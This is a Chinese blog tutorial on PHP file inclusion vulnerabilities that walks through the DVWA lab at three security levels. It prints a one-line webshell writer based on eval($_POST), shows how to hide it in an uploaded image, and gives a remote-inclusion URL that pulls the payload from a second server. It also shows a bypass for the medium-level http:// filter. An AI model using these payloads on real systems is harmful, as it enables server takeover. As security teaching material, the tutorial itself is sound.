Web安全-文件包含漏洞

最新推荐文章于 2021-03-23 07:30:08 发布
最新推荐文章于 2021-03-23 07:30:08 发布
阅读量245 收藏 3
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37786014/article/details/103309131
版权
一. 什么是文件包含漏洞

开发人员通常会把重复可用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般称为包含。攻击者利用这种包含的特性,加上应用本身对文件控制不严,对include进来的文件不可控,最终造成了攻击者进行恶意文件包含。

二. 引发文件包含漏洞的4个参数

1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。
2、include_once() 功能和 include() 相同,区别在于当重复调用同一文件时,程序只调用一次。
3、require() 只要程序一执行就会立即调用文件,发生错误的时候会输出错误信息,并且终止脚本的运行。
4、require_once() 它的功能与 require() 相同,区别在于当重复调用同一文件时,程序只调用一次。
include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。
而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。
当使用这四个函数包含一个新文件时,该文件将作为 PHP 代码执行,php 内核并不在意该被包含的文件是什么类型。所以如果被包含的是 txt 文件、图片文件、远程 url、也都将作为 PHP 代码执行。

三、文件包含漏洞的分类

(1)本地文件包含 :LFI
当被包含的文件在服务器本地时,就叫本地文件包含。
(2)远程文件包含:RFI
当被包含的文件再远程服务器时,就叫远程文件包含。相对来说远程文件包含更容易进行攻击,但是前提条件是需要开启php.ini 中的allow_url_fopen 和 allow_url_include来允许远程文件包含。
在这里插入图片描述

四、文件包含漏洞的原理

文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
示例代码

五、文件包含示例
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

G E T [ ′ f i l e n a m e ′ ] 参 数 开 发 者 没 有 经 过 严 格 的 过 滤 , 直 接 带 入 了 i n c l u d e 的 函 数 , 攻 击 者 可 以 修 改 _GET['filename']参数开发者没有经过严格的过滤,直接带入了include的函数,攻击者可以修改 GET[filename]include_GET[‘filename’]的值,执行非预期的操作。
举例:
在这里插入图片描述
正常情况下,我们是访问index.php这个主页,但是我们可以通过以下方式进行文件包含
在这里插入图片描述
使用上图的方式,主页就包含y.txt的代码
A:低安全级别文件包含漏洞**
在这里插入图片描述
在这里插入图片描述
两个图中的page是对应的,page后面的文件里可以是一句话木马。
2、
在这里插入图片描述
执行上图中的1,表示会执行本地包含的passwd文件,执行上图中的2表示会远程执行romote sever上的一句话,这句话的目的是生成一句话木马shell.php文件。

具体实现方式见下面所示:
a:制作一句话木马,如yangge.jpg

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangge]);?>')?>

b:上传图片木马文件
c:执行文件包含并生成后门
d:通过菜刀连接webshell
制作一句话木马的方式:
(1)将dzq2.jpg图片文件拖到edjpgcpm.exe文件里面
(2)按照图片编辑一句话木马
在这里插入图片描述
(3)将带有木马的图片上传上去
在这里插入图片描述
在这里插入图片描述
(4)浏览器执行已经上传的图片
在这里插入图片描述
(5)步骤4执行完成以后会生成一个shell20.php的文件,然后就可以用菜刀工具打开进行操作了

3、远程文件包含
(1)得到一个远程服务器192.168.106.177,在服务器上创建一个文件,文件名:yangge.txt,文件内容

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangge]);?>')?>

在这里插入图片描述
(2)在本地打开:http://192.168.106.134/dvwa/valnerablities/fi/?page=http://192.168.106.177/yangge.txt
在这里插入图片描述
中安全级别文件包含漏洞
1.源码示例
在这里插入图片描述
这种限制对本地文件包含是没有影响的。限制的目的是将url中的http://去掉,禁止了远程文件包含,所以按照上面低安全级别的步骤进行操作是不能达到目的的。但是我们可以绕过这个限制:
2.绕过方式
(1)http://192.168.106.134/dvwa/valnerablities/fi/page=httphttp://: //192.168.106.177/yangge.txt
这里替换到一个http://以后还有一个http://
以此类推,我们可以使用hthttp://tp:// http://http://等方式

高安全级别漏洞

  1. 源码示例
    在这里插入图片描述
    上图源码含义就是只能使用include.php文件,这种情况下就没有文件包含漏洞问题了
催催催不翠
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含
a965527596的博客
07-31 326
文件包含 1.原理 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的检验,从而使攻击者操作了预想之外的文件 2.危害 可能会导致包含webshell,文件读取,命令执行等 3.判断和可能出现位置 a.判断 读取一个本地的文件看是否能去读取成功 b.可能出现位置 在file=参数,或者一个参数后跟着是文件名都可以试试 4.基础利用 - 直接包含webshell ?file=shell.jpg //可以用菜刀直接连接这个地址 - 利用php://filter/read协议 ?filename=php
文件包含漏洞全面详解
最新发布
heike_Ch的博客
04-24 971
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
php文件包含种类,文件包含漏洞详解
weixin_34921325的博客
03-23 320
1、文件包含漏洞简介文件包含漏洞是“代码注入”的一种,其原理就是注入一段用户能控制的脚本或者代码,并让服务器执行。2、常见的文件包含的函数PHP:include(),include_once,require(),require_once(),fopen(),readfile()...JSP/Servlet:ava.io.File(),java.io.FileReader()...ASP:inclu...
php中fputs写入一句话,PHP fputs( )用法及代码示例
weixin_39544333的博客
03-11 601
PHP中的fputs()函数是一个内置函数,用于写入打开的文件。fputs()函数在文件末尾或达到指定长度(作为参数传递)时停止,以先到者为准。文件,字符串和必须写入的长度作为参数发送到fputs()函数,它返回成功时写入的字节数,失败时返回FALSE。fputs()函数是fwrite()函数的别名。用法:fputs(file, string, length)使用的参数:PHP中的fputs()函...
利用漏洞本地上传工具
05-14
利用漏洞本地上传上传大马,拿shall超级简单
009-Web安全基础5 - 文件处理漏洞.pptx
10-22
【文件处理漏洞】是Web应用程序安全中的一个重要话题,主要涉及两个方面:任意文件上传和任意文件下载。这两种漏洞都可能导致严重的安全风险,让攻击者能够操控服务器或获取敏感信息。 **任意文件上传漏洞**通常...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
网络安全基础-文件上传漏洞
08-30
网络安全基础中的文件上传漏洞是网络应用安全领域一个重要的知识点,尤其在Web开发中,它涉及到服务器的安全性与用户数据的保护。文件上传漏洞允许恶意用户上传可执行代码或恶意文件到服务器,从而可能控制服务器...
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
PHP代码执行函数总结
11-15 862
&#13;   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。&#13;   常见代码执行函数,如  &#13;     eval()、assert()、preg_replace()、create_function()&#13;     array_map()、call_user_func()、call_user_fun...
文件包含漏洞(绕过姿势)
求天下者,积少成多
06-01 9922
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p
远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号与双引号问题)
1stPeak's Blog
04-24 1731
远程包含shell 需要allow_url_open=On,才可以尝试远程包含一句话木马: http://www.xxx.com/echo.txt, 代码如下。 <?php fputs (fopen("shell.php","w"),'<?php eval($_POST[cmd]);?>') ?> 或者 <?php $b='<?php eval($_POST[...
xctf web之 command_execution
L1ni01
08-06 228
打开题目 源代码也没东西 题目为 命令执行 并且题目提示没 waf 肯定就用到命令执行漏洞 先介绍一下 命令执行漏洞: 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 常见连接符 ;A;B 先执行A,再执行B & A&B 简单拼接,A B之间无制约关系 | A|B 显示B的执行结果 &&amp
文件包含漏洞
forwardss的博客
03-08 1024
文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接用此文件,而无需 再次编写,这种调用文件的过程一般被称为包含。 一、原理和定义 为什么会产生文件包含漏洞? 程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正 是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 以phpwebapplication 中...
文件包含知识点总结
千寻的博客
02-10 697
文章目录第一章 概述第一节 说明第二节 漏洞产生的原因第二章 PHP中的文件包含第一节 语句第二节 相关配置第三节 文件包含示例第三章 漏洞原理及特点第一节 漏洞原理第二节 特点第三节 空字符安全绕过第四章 文件包含漏洞的利用第一节 读取敏感文件第二节 直接包含图片木马第三节 包含木马写Shell第四节 PHP 封装协议--访问本地文件第五节 PHP 封装协议--传输PHP 文件第六节 PHP ...
PHP一句话木马后门
chuangqudiao9845的博客
03-23 2491
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。 一句话木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去...
渗透测试:代码注入漏洞的三三两两
WEL测试
12-01 851
什么是远程文件包含漏洞 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 在通过PHP的函数引入文件时,由于传入 的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。 如果PHP的配置选项allow_url_include为ON的话,则include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞PHP常见的导致文件包含的函数如下: include()
理解Web安全文件包含漏洞深度解析
"该文件是关于web安全的专题培训材料,主要探讨了文件包含漏洞这一主题,涵盖了文件包含漏洞的基础知识、利用技巧,以及在JSP、ASPX和PHP环境中的具体表现和利用条件。" 文章正文: 文件包含漏洞Web应用程序安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值